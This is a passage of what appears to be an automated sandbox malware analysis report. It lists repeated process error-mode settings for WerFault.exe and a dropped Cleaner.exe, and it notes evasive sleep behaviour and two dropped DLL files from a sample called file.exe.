Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 5340	Thread sleep count: 119 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5340	Thread sleep time: -71400s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4692	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 60000

Jump to behavior

